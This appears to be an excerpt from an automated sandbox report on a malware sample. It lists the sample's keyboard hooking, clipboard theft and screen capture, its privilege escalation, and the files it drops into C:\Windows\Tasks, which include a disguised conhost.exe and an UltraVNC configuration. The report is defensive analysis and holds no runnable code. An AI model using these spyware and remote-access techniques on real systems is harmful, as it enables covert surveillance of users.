                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Contains functionality to register a low level keyboard hook
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,000000000_2_00408630
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00007FF6C2BB13A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00007FF6C2BB13A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B81DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,23_2_00007FF6C2B81DD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,27_2_00007FF6C2BB13A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B81DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,27_2_00007FF6C2B81DD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B81AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,23_2_00007FF6C2B81AE0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAF980 EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,ReleaseDC,DeleteDC,CreateDCA,EnumDisplaySettingsA,FreeLibrary,EnumWindows,GetDC,CreateCompatibleDC,GetLastError,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetLastError,GetDIBits,GetDIBits,GetDeviceCaps,InvalidateRect,23_2_00007FF6C2BAF980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA31B0 GetKeyboardState,23_2_00007FF6C2BA31B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B974C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,23_2_00007FF6C2B974C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B974C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,27_2_00007FF6C2B974C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B92E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_00007FF6C2B92E40
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B91D10 WTSGetActiveConsoleSessionId,WTSGetActiveConsoleSessionId,CreateEnvironmentBlock,SetLastError,CreateProcessAsUserA,GetLastError,GetLastError,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,DestroyEnvironmentBlock,SetLastError,CreateProcessAsUserA,GetLastError,GetLastError,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,CloseHandle,23_2_00007FF6C2B91D10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B934B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF6C2B934B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B93550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF6C2B93550
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B934B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,27_2_00007FF6C2B934B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B93550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,27_2_00007FF6C2B93550
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\3889122.Khe9oLYJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\9655269573Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\DygIR.vkc0fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\go3uE.OUJMAJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\uqVb3.kkb9hJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Xv6Ya.d8LhTJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\9655269573.cmdJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\3889122.cmdJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\browser_sn.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_004057210_2_00405721
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_004139D10_2_004139D1
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00413AAB0_2_00413AAB
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_004133700_2_00413370
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00413D430_2_00413D43
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040AD300_2_0040AD30
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA36D023_2_00007FF6C2BA36D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B94C1023_2_00007FF6C2B94C10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C3E40023_2_00007FF6C2C3E400
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAA42023_2_00007FF6C2BAA420
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA6BBD23_2_00007FF6C2BA6BBD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9B3D023_2_00007FF6C2B9B3D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B993E023_2_00007FF6C2B993E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B87BE223_2_00007FF6C2B87BE2
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9BB8023_2_00007FF6C2B9BB80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B97B9023_2_00007FF6C2B97B90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8439023_2_00007FF6C2B84390
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA739B23_2_00007FF6C2BA739B
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B87BA623_2_00007FF6C2B87BA6
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B87B3723_2_00007FF6C2B87B37
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B87B7123_2_00007FF6C2B87B71
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B91D1023_2_00007FF6C2B91D10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9AD3023_2_00007FF6C2B9AD30
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA2CC023_2_00007FF6C2BA2CC0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB1CE023_2_00007FF6C2BB1CE0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BADCF023_2_00007FF6C2BADCF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8DCF023_2_00007FF6C2B8DCF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C48C9023_2_00007FF6C2C48C90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB54A023_2_00007FF6C2BB54A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB5CA023_2_00007FF6C2BB5CA0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB346023_2_00007FF6C2BB3460
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C42C7023_2_00007FF6C2C42C70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8420023_2_00007FF6C2B84200
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B87A1C23_2_00007FF6C2B87A1C
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA5A3323_2_00007FF6C2BA5A33
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA51B723_2_00007FF6C2BA51B7
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8E1D023_2_00007FF6C2B8E1D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C409F023_2_00007FF6C2C409F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B879E923_2_00007FF6C2B879E9
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAF98023_2_00007FF6C2BAF980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9898023_2_00007FF6C2B98980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B881AD23_2_00007FF6C2B881AD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAD15023_2_00007FF6C2BAD150
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8517023_2_00007FF6C2B85170
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B87B0423_2_00007FF6C2B87B04
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAAB1023_2_00007FF6C2BAAB10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB033023_2_00007FF6C2BB0330
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAC2C023_2_00007FF6C2BAC2C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BF12C023_2_00007FF6C2BF12C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B87ACF23_2_00007FF6C2B87ACF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B83A9023_2_00007FF6C2B83A90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B87A9A23_2_00007FF6C2B87A9A
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA623E23_2_00007FF6C2BA623E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C3725023_2_00007FF6C2C37250
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B87A5B23_2_00007FF6C2B87A5B
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA8A7023_2_00007FF6C2BA8A70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9027023_2_00007FF6C2B90270
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8227023_2_00007FF6C2B82270
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8C81023_2_00007FF6C2B8C810
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAE78023_2_00007FF6C2BAE780
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C3DF8023_2_00007FF6C2C3DF80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9974023_2_00007FF6C2B99740
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9AF6023_2_00007FF6C2B9AF60
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8377023_2_00007FF6C2B83770
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9110023_2_00007FF6C2B91100
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8A91023_2_00007FF6C2B8A910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9693023_2_00007FF6C2B96930
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9A13023_2_00007FF6C2B9A130
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9C8D023_2_00007FF6C2B9C8D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B920E023_2_00007FF6C2B920E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8188023_2_00007FF6C2B81880
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9A89023_2_00007FF6C2B9A890
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9C09023_2_00007FF6C2B9C090
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B970B023_2_00007FF6C2B970B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAA87023_2_00007FF6C2BAA870
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B98E1023_2_00007FF6C2B98E10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9E61023_2_00007FF6C2B9E610
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB3E2023_2_00007FF6C2BB3E20
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA162023_2_00007FF6C2BA1620
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA6DD123_2_00007FF6C2BA6DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B81DD023_2_00007FF6C2B81DD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA4D7E23_2_00007FF6C2BA4D7E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9859023_2_00007FF6C2B98590
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9C5B023_2_00007FF6C2B9C5B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C4068C23_2_00007FF6C2C4068C
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B84E8023_2_00007FF6C2B84E80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA265023_2_00007FF6C2BA2650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD065023_2_00007FF6C2BD0650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB166023_2_00007FF6C2BB1660
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAAE7023_2_00007FF6C2BAAE70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B94C1027_2_00007FF6C2B94C10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C3E40027_2_00007FF6C2C3E400
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAA42027_2_00007FF6C2BAA420
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA6BBD27_2_00007FF6C2BA6BBD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9B3D027_2_00007FF6C2B9B3D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B993E027_2_00007FF6C2B993E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B87BE227_2_00007FF6C2B87BE2
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9BB8027_2_00007FF6C2B9BB80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B97B9027_2_00007FF6C2B97B90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8439027_2_00007FF6C2B84390
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA739B27_2_00007FF6C2BA739B
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B87BA627_2_00007FF6C2B87BA6
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B87B3727_2_00007FF6C2B87B37
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B87B7127_2_00007FF6C2B87B71
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B91D1027_2_00007FF6C2B91D10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9AD3027_2_00007FF6C2B9AD30
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB1CE027_2_00007FF6C2BB1CE0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BADCF027_2_00007FF6C2BADCF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8DCF027_2_00007FF6C2B8DCF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C48C9027_2_00007FF6C2C48C90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB54A027_2_00007FF6C2BB54A0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB5CA027_2_00007FF6C2BB5CA0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB346027_2_00007FF6C2BB3460
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C42C7027_2_00007FF6C2C42C70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8420027_2_00007FF6C2B84200
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B87A1C27_2_00007FF6C2B87A1C
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA5A3327_2_00007FF6C2BA5A33
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA51B727_2_00007FF6C2BA51B7
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8E1D027_2_00007FF6C2B8E1D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C409F027_2_00007FF6C2C409F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B879E927_2_00007FF6C2B879E9
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAF98027_2_00007FF6C2BAF980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9898027_2_00007FF6C2B98980
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B881AD27_2_00007FF6C2B881AD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAD15027_2_00007FF6C2BAD150
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8517027_2_00007FF6C2B85170
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B87B0427_2_00007FF6C2B87B04
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAAB1027_2_00007FF6C2BAAB10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB033027_2_00007FF6C2BB0330
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAC2C027_2_00007FF6C2BAC2C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BF12C027_2_00007FF6C2BF12C0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B87ACF27_2_00007FF6C2B87ACF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B83A9027_2_00007FF6C2B83A90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B87A9A27_2_00007FF6C2B87A9A
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA623E27_2_00007FF6C2BA623E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C3725027_2_00007FF6C2C37250
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B87A5B27_2_00007FF6C2B87A5B
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA8A7027_2_00007FF6C2BA8A70
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9027027_2_00007FF6C2B90270
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8227027_2_00007FF6C2B82270
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8C81027_2_00007FF6C2B8C810
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAE78027_2_00007FF6C2BAE780
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C3DF8027_2_00007FF6C2C3DF80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9974027_2_00007FF6C2B99740
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9AF6027_2_00007FF6C2B9AF60
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8377027_2_00007FF6C2B83770
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9110027_2_00007FF6C2B91100
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8A91027_2_00007FF6C2B8A910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9693027_2_00007FF6C2B96930
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9A13027_2_00007FF6C2B9A130
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9C8D027_2_00007FF6C2B9C8D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B920E027_2_00007FF6C2B920E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8188027_2_00007FF6C2B81880
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9A89027_2_00007FF6C2B9A890
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9C09027_2_00007FF6C2B9C090
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B970B027_2_00007FF6C2B970B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAA87027_2_00007FF6C2BAA870
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B98E1027_2_00007FF6C2B98E10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9E61027_2_00007FF6C2B9E610
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB3E2027_2_00007FF6C2BB3E20
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA162027_2_00007FF6C2BA1620
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA6DD127_2_00007FF6C2BA6DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B81DD027_2_00007FF6C2B81DD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA2DF327_2_00007FF6C2BA2DF3
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA4D7E27_2_00007FF6C2BA4D7E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9859027_2_00007FF6C2B98590
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9C5B027_2_00007FF6C2B9C5B0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA36D027_2_00007FF6C2BA36D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C4068C27_2_00007FF6C2C4068C
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B84E8027_2_00007FF6C2B84E80
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA265027_2_00007FF6C2BA2650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD065027_2_00007FF6C2BD0650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB166027_2_00007FF6C2BB1660
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAAE7027_2_00007FF6C2BAAE70
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: String function: 004026B0 appears 38 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF6C2B8AE30 appears 34 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF6C2BEA3B0 appears 38 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF6C2C37C50 appears 60 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF6C2C39500 appears 42 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF6C2B83730 appears 730 times
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: String function: 00007FF6C2C370B4 appears 56 times
                            Source: Xv6Ya.d8LhT.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
